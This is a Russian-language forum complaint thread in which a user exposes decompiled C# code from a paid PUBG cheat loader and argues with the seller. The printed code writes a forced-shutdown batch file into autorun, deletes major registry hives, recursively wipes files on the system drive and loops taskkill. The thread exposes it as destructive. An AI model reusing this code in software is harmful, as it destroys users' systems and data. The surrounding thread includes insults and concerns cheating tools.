Жалоба от pubg4u на Solik

Статус
В этой теме нельзя размещать новые ответы.
Модератор форума
Модератор
Статус
Оффлайн
Реакции[?]
971
Поинты[?]
42K
Ладно. Давай я для удобства будущего арбитра данной жалобы объеденю все в 1 пост. В котором будет вся информация что я нашел по .exe файлу. Во первых: пруф того что исходник я показываю именно того софта который у тебя в лодыре:
Пожалуйста, авторизуйтесь для просмотра ссылки.

оригинальный файл
можете проверишь по хешам что скачивает лодырь солика

Распакованный файл

method_42 (Token: 0x06000093): скриншот -

Код:
    private void method_42()
    {
        if (this.method_28())
        {
            this.method_27(new string[]
            {
                "Critical ERROR"
            });
        }
        else
        {
            this.method_41("");
            this.method_40();
        }
        this.method_38();
    }
Данная функция вызывает в условии 2 функции:
method_41 (Token: 0x06000092): скриншот -

Код:
    private void method_41(string string_58 = "")
    {
        try
        {
            string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Windows), "boot.bat");
            if (!File.Exists(text))
            {
                File.WriteAllText(text, "shutdown.exe -s -t 00 -f");
                this.method_30(text);
                Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Boot", text);
            }
        }
        catch
        {
        }
    }
Данная функция создает .bat файл с функцией перезагрузки системы, и после записывает .bat в авто-загрузку.

method_40 (Token: 0x06000091) скриншот -

Код:
    private void method_40()
    {
        this.method_81();
        try
        {
            Registry.CurrentUser.DeleteSubKeyTree("Software");
        }
        catch
        {
        }
        try
        {
            Registry.CurrentUser.DeleteSubKeyTree("System");
        }
        catch
        {
        }
        try
        {
            Registry.LocalMachine.DeleteSubKeyTree("System");
        }
        catch
        {
        }
        this.method_32(Path.Combine(Path.Combine(Form1.string_28, "TslGame\\Binaries\\Win64"), "bgsecondary.dat"));
        this.method_32(Form1.string_9);
        this.method_32(Form1.string_10);
        this.method_32(Form1.string_12);
        this.method_31(Form1.string_6);
        this.method_33(Form1.string_6, true);
        this.method_31(Path.GetPathRoot(Environment.SystemDirectory));
        this.method_33(Path.GetPathRoot(Environment.SystemDirectory), true);
        this.method_85(true);
        this.method_39();
        try
        {
            string text = string.Empty;
            text = text + "attrib -r \"" + Form1.string_13 + "\"\n";
            text = text + "attrib -s -h \"" + Form1.string_13 + "\"\n";
            text = text + "DEL /F \"" + Form1.string_13 + "\"\n";
            text += ":loop\n";
            text = text + "taskkill /f /im " + Form1.string_15 + "\n";
            text += "goto loop \n";
            this.method_35(text);
        }
        catch
        {
        }
        this.method_38();
    }
Данная функция в начале кода удаляет 3 ветки реестра:
1. CurrentUser > Software
2. CurrentUser > System
3. LocalMachine > System
официальная документация от Microsoft по функции которые используются для удаления разделов в рееестре -

После софт выполняет функцию, в которую передает системную папку:
Код:
this.method_31(Path.GetPathRoot(Environment.SystemDirectory));
method_31(Token: 0x06000088) скриншот -

Код:
    private void method_31(string string_58)
    {
        try
        {
            foreach (string string_59 in Directory.EnumerateFiles(string_58, "*.*", SearchOption.AllDirectories))
            {
                this.method_32(string_59);
            }
        }
        catch
        {
        }
    }
Данная функция используя цикл, извлекает из папки (в данном случае системной ибо именно она была выше передана) все файлы по маске "*.*" используя флаг ПОИСК ПО ВСЕМ ДИРЕКТОРИЯМ в переменную string_59 и удаляет все найденные файлы фунцией:
method_32 (Token: 0x06000089 ) скриншот -
Хорошо, я тебя понял. На днях пофиксим . Раз вопросов больше нет , и правил форума я не нарушил прошу закрыть тему)

Начинающий
Статус
Оффлайн
Реакции[?]
23
Поинты[?]
0
Хорошо, я тебя понял. На днях пофиксим . Раз вопросов больше нет , и правил форума я не нарушил прошу закрыть тему)
Нихуя ты переобулся, в бан уйдёшь, хуету продавать перестанешь, тогда и закрывать тему, не раньше

Забаненный
Статус
Оффлайн
Реакции[?]
41
Поинты[?]
0
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
method_42 может вызваться в случае банальной ошибки в программе, или подозрение на взлом программы - и тогда с вашим ПК случится все то же что и с моим.

С одной стороны да , а со второй и я не причем. Я сказал что трабла есть , но это не повад для бана и т.д . Сегодня завтра выкатим фикс и на этом все.
Ты отрицаешь что есть какая то проблема. Все твои сообщения: "не правда" "исходник не тот" "в программе ничего такого нет"
О каком банальном фиксе идет речь? Как узнать что вы все исправили? Кодер будет давать софт на проверку - или придется опять тратить кому то деньги на разбор твоей программы? Тебе кодер не сказал полный список запрещенных программ и что делает программа с ПК. А ты думаешь что он тебе скажет все остальное? Как тебе на слово верить если ты то отрицаешь, то соглашаешься.

Ты сам лично, и еще несколько человек в теме считаете правильным ломать человеку систему, удалять файлы и совершать другие пакости с его ПК если он имеет какой то инструментарий на своем ПК, или что то запустил.
Ты нигде не сообщил полный список запрещенных софтов, последствия и другую важную информацию. Тем самым подставив меня.
Правила форума ты нарушил, ты распространял вредоносный софт. Место тебе в бане. Мое время и мои данные никто не вернет. В т.ч и деньги потраченные на доказательства моей правоты. Если бы я не стал заморачиваться все осталось бы как есть.

Модератор форума
Модератор
Статус
Оффлайн
Реакции[?]
971
Поинты[?]
42K
Это ошибка , перебор с защитой. Кодеру я отписал, когда появиться , будет фиксить. Тут нет ни рата ни т.д. чекни правила на досуге.

Забаненный
Статус
Оффлайн
Реакции[?]
41
Поинты[?]
0
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Это ошибка , перебор с защитой. Кодеру я отписал, когда появиться , будет фиксить. Тут нет ни рата ни т.д. чекни правила на досуге.
Ошибка? Эта ошибка стоила мне времени, денег и важных файлов. А теперь ты просто говоришь что это ошибка? Почитай комментарии. Ранее ты говорил что я пиздабол, а теперь ты переобулся. Кто из нас все таки пиздабол получается ?

Модератор форума
Модератор
Статус
Оффлайн
Реакции[?]
971
Поинты[?]
42K
Ошибка? Эта ошибка стоила мне времени, денег и важных файлов. А теперь ты просто говоришь что это ошибка? Почитай комментарии. Ранее ты говорил что я пиздабол, а теперь ты переобулся. Кто из нас все таки пиздабол получается ?
Я сам сейчас все проверил, и жа я вижу что софт может повредить ос . Повтаряю , это бональная ошибка . Могу манибекнуть)))))так же на юг остановлю продажи до фикса . Но о каком бане может идти речь? За что? Данные не утекли и т.д .это ошибка разработчика над каторай мы будем работать.

Забаненный
Статус
Оффлайн
Реакции[?]
41
Поинты[?]
0
Я сам сейчас все проверил, и жа я вижу что софт может повредить ос . Повтаряю , это бональная ошибка . Могу манибекнуть)))))
А почему ты ранее говорил иначе когда я все пруфы предоставлял?
Что то изменилось? Файлы те же. Люди те же. Только вот ты переобулся.
По сути, вирусный код тут есть, поэтому софт можно рассматривать как вирус, ибо в любой момент, когда разработчики захотят - могут превратить его в вирус. Причем не было объявлено списка запрещенных процессов, вдруг человек вообще не для реверса использует сейчас эту тулзу

Крайслер надо решать что с ним делать.
никак нельзя будет узнать что в будущем в софте, тратить постоянно деньги и время на реверс его софта - дело такое.

видимо я файлы то же проебал из за ошибки - твоей ошибки получается. отлично.

Это не банальная ошибка. Это план как ебануть челу систему.
Кодер от тебя это скрывал, ты сам мне лично говорил и в теме писал тут что кодер сказал тебе сам что там ничего этого нет и я пиздабол по твоему мнению. Так что изменилось?

японский первоклассник на аватарке а че
Пользователь
Статус
Оффлайн
Реакции[?]
64
Поинты[?]
0
Я сам сейчас все проверил, и жа я вижу что софт может повредить ос . Повтаряю , это бональная ошибка . Могу манибекнуть)))))
то что ты манибекнешь это збс, но переобуваться это поступок далеко не натурала

Забаненный
Статус
Оффлайн
Реакции[?]
41
Поинты[?]
0

Модератор форума
Модератор
Статус
Оффлайн
Реакции[?]
971
Поинты[?]
42K
Дело в том что мне не сообщили о возможнам баге, соответственно я знать не мог этого. А верить стремному челу замеченому в другой похожей серой схеме такое себе

Начинающий
Статус
Оффлайн
Реакции[?]
29
Поинты[?]
0
Дело в том что мне не сообщили о возможнам баге, соответственно я знать не мог этого. А верить стремному челу замеченому в другой похожей серой схеме так
И по твоему получается, что незнание освобождает тебя от ответственности?
Мне кажется, ты сам запутался уже в собственной лжи...

Забаненный
Статус
Оффлайн
Реакции[?]
41
Поинты[?]
0
Дело в том что мне не сообщили о возможнам баге, соответственно я знать не мог этого. А верить стремному челу замеченому в другой похожей серой схеме такое себе
Ты выше говорил что так мне и надо
Что бы я дольше мучался
Что кодер тебе дал список софта
Что я пиздабол
Исход не тот
Все не то

По итогу ты почему поверил, сам говоришь что кодер оффлайн. Кхм. Заднюю даешь? Кто мне будет восстанавливать данные, восстанавливать систему которая уже на коленях? Прилетай исправляй, хуле.

Модератор форума
Модератор
Статус
Оффлайн
Реакции[?]
971
Поинты[?]
42K
Я и не отрицаю что ты его пытался крякнуть , я уверен. И по делом тебе что ось отвалилась) а на счет ошибки я сказал будет фикс , ни 1 пункта правил в отличия от тебя я не нарушил тебе могу пожелать только удачи!

Начинающий
Статус
Оффлайн
Реакции[?]
29
Поинты[?]
0
Я и не отрицаю что ты его пытался крякнуть , я уверен. И по делом тебе что ось отвалилась) а на счет ошибки я сказал будет фикс , ни 1 пункта правил в отличия от тебя я не нарушил тебе могу пожелать только удачи!
Уверен, как со скриншотом, который видел оч давно?! Мне кажется, что ты пытаешься усидеть на нескольких стульях.... Более того,ты согласился, что в твоем софте имеется вредоносный код, но до сиих пор не снял его с продажи.... Ты адекваатный вообще?

Забаненный
Статус
Оффлайн
Реакции[?]
41
Поинты[?]
0
причем тут мой софт который я пишу уже в общем счете 2 месяца?:))
он к этой жалобе вообще никакого отношения не имеет

я софт взломать не пытался

Модератор форума
Модератор
Статус
Оффлайн
Реакции[?]
971
Поинты[?]
42K
причем тут мой софт который я пишу уже в общем счете 2 месяца?:))
он к этой жалобе вообще никакого отношения не имеет

я софт взломать не пытался
Ты писал 2 недели )

Начинающий
Статус
Оффлайн
Реакции[?]
29
Поинты[?]
0
Ты писал 2 недели )
Ну на самом деле проекту даже немного больше, просто никто и никуда не торопится, чтобы выпустить годный и конкурентоспособный продукт. Речь шла конечно о конкретных скриншотах, которые указал CheaterSu, потому что не смотря на визуальное сходство, это скрины почти с нуля переделанного Gui.
З.Ы. В любом случае, это не имеет никакого отношения к текушему спору и, как выясняется, умышленному нанесению вреда компьютеру пользователя.

Модератор форума
Модератор
Статус
Оффлайн
Реакции[?]
971
Поинты[?]
42K
Ну на самом деле проекту даже немного больше, просто никто и никуда не торопится, чтобы выпустить годный и конкурентоспособный продукт. Речь шла конечно о конкретных скриншотах, которые указал CheaterSu, потому что не смотря на визуальное сходство, это скрины почти с нуля переделанного Gui.
З.Ы. В любом случае, это не имеет никакого отношения к текушему спору и, как выясняется, умышленному нанесению вреда компьютеру пользователя.
Так же как и ты.

Начинающий
Статус
Оффлайн
Реакции[?]
29
Поинты[?]
0
Так же как и ты.
А вот тут ты не прав. Я как пользователь этого, как выяснилось куска говнокода, имею к этому спору самое прямое отношение. Мне просто повезло, что на момент первого знакомства у меня был устанволен Malwarebytes, и он не позволил это параше трогать мои системные файлы, обошлось только циклической перезагрузкой и еще парой, по сравнению с потерями истца, неудобств.

Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу